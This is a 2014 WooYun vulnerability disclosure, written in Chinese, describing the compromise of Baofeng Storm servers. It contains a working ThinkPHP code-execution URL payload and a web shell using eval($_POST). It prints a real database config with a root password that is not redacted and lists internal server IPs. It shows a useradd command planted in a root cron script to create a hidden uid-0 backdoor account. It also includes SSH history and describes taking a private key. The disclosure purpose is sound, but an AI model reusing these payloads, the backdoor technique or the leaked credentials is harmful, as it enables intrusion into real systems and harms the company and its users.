当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062645

漏洞标题:漫游暴风影音并发现一系列安全问题

相关厂商:暴风影音

漏洞作者: redrain有节操

提交时间:2014-05-28 15:10

修复时间:2014-06-02 15:11

公开时间:2014-06-02 15:11

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某日志伺服器存在代码执行,由于运维疏忽导致其某台服务器私钥泄露和一系列安全问题
panxiaodong同学,你惹大祸了,怎么能这么管理服务器呢
部分支持外联的数据库和敏感信息已打码,快整改吧~
(在整个过程中未做任何恶意篡改)

详细说明:

http://config.baofeng.com
这台伺服器使用了thinkphp框架并未打补丁,之前的代码执行成功利用
http://config.baofeng.com/index.php/module/action/param1/{${phpinfo()}}

3.png


http://config.baofeng.com/index.php/module/action/param1/{${eval($_POST[s])}}
成功getshell
随后发现站点做了cdn,获取了其几个IP后,依次翻看
221.238.27.174
60.28.110.197
117.79.151.24
211.100.58.83
117.79.151.23
这几台主机,在/opt/programs/sifu/Conf/下发现数据库配置文件

<?php 
return array(
'URL_MODEL'=>1, // 如果你的环境不支持PATHINFO 请设置为3
'SESSION_AUTO_START' =>false,
'DB_TYPE'=>'mysql',
'DB_HOST'=>'***.***.**.174',
'DB_NAME'=>'sifu_repair',
'DB_USER'=>'root',
'DB_PWD'=>'223238',
'DB_PORT'=>'3306',
'DB_PREFIX'=>'sifu_',
'APP_DEBUG' => 0,
'HTML_CACHE_ON' => true,//开启静态缓存
'HTML_PATH' => '/opt/sifu/sifu/pop',//静态缓存文件目录,HTML_PATH可任意设置,此处设为当前项目下新建的html目录
'MEMCACHE_HOST'=>'221.238.27.174',//memcache主机ip配置
'MEMCACHE_PORT'=>'11211', //memcache端口配置
'ACCESS_IPS'=>'192.168.%,127.0.0.1,218.***.***.34,60.***.**.102',//允许访问ip地址配置,%为通配符
'LOG_RECORD'=>false,
);
?>


发现居然统一口令。。。。给跪
223238是你们的电话号码么

4.png


打码两台貌似是数据分析的监测平台,避免信息漏点,就不贴图了
继续翻看,在117.79.151.23这台中,
/opt/script/发现了两个python脚本

5.png


成功在飞信登陆

2.png


这是可以给员工发短信的节奏了么
panxiaodong同学。。。唔,应该是苦逼的运维同学吧

6.png


成功登陆暴风影音邮箱

1.png


以上都是小事,接下来可能导致的问题才是正片
0x01
测试过程中,发现/opt/programs/sifu/result/下所生成的日志文件都是root,并且每天定时更新,追根溯源,找到了生成日志的脚本文件

#!/bin/bash
###################
#计算伺服总请求数量
#福玉 2011116
###################
stat_date=`date -d "1 days ago" +"%Y%m%d"`
stat_date1=`date -d "1 days ago" +"%Y%m%d"`
echo $stat_date
zcat /opt/data/logs/sifu/access_$stat_date*|awk -F'=' '{print $2}'|awk -F'&' '{print $1}'|sort |uniq -c|awk -F' ' '{print $1"\t"$2"\t24"}' > /opt/programs/sifu/result/request_$stat_date.csv
/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8;delete from sifu_scheme_request_data where ip='24' and stat_date=${stat_date1}";
/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8; load data local infile '/opt/programs/sifu/result/request_${stat_date}.csv' replace into table sifu_scheme_request_data (count,version,ip) set stat_date=${stat_date1};"


并且发现www的组有可写权限
于是乎,加了这么一条命令

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash website -p $1$K3gq/1E2$afsX.mfcBaLXIIItgz29Q.asdf=123


也就是说,在系统执行cron计划任务的时候,除了以root权限生成每天的日志,还会添加一个用户名为website,密码为asdf=123的root用户
以此来达到提升权限的目的
0x02
在用户目录下,翻看.bash_history
su -c "ssh -t uniondown@61.155.220.222 sudo ln -s /opt/baofeng-data/league/package/3.10.06.30.exe /opt/baofeng-data/league/package/3.10.06.30_124.exe" uniondown;
exit
ssh-keygen -d
ls
cd ~
ls
ls -a
cd .ssh
ls
cat id_dsa.pub
cd ..
ls -ah
ll -ah
ssh 122.139.57.37
ls
ls -a
ll
cd .ssh
ls
ll
vi known_hosts
exit
ll
cd .ssh/
ll
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
支持看来是运维当时用这台主机以uniondown用户身份私钥登陆了61.155.220.222
果断进入.ssh目录,发现了私钥id_dsa

7.png


接下来就是后渗透了,并且还发现一个pop和暴风影音客户端的弹窗配置,大概看了一下,貌似可以修改弹窗广告地址,如果修改为恶意地址,那么批量挂马则非常简单,请暴风安全方面的同学务必认真整改
点到为止,以上

漏洞证明:

3.png


<?php 
return array(
'URL_MODEL'=>1, // 如果你的环境不支持PATHINFO 请设置为3
'SESSION_AUTO_START' =>false,
'DB_TYPE'=>'mysql',
'DB_HOST'=>'***.***.**.174',
'DB_NAME'=>'sifu_repair',
'DB_USER'=>'root',
'DB_PWD'=>'223238',
'DB_PORT'=>'3306',
'DB_PREFIX'=>'sifu_',
'APP_DEBUG' => 0,
'HTML_CACHE_ON' => true,//开启静态缓存
'HTML_PATH' => '/opt/sifu/sifu/pop',//静态缓存文件目录,HTML_PATH可任意设置,此处设为当前项目下新建的html目录
'MEMCACHE_HOST'=>'221.238.27.174',//memcache主机ip配置
'MEMCACHE_PORT'=>'11211', //memcache端口配置
'ACCESS_IPS'=>'192.168.%,127.0.0.1,218.***.***.34,60.***.**.102',//允许访问ip地址配置,%为通配符
'LOG_RECORD'=>false,
);
?>


4.png


5.png


2.png


6.png


1.png


7.png

修复方案:

打回重做吧,这几台服务器

版权声明:转载请注明来源 redrain有节操@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-02 15:11

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无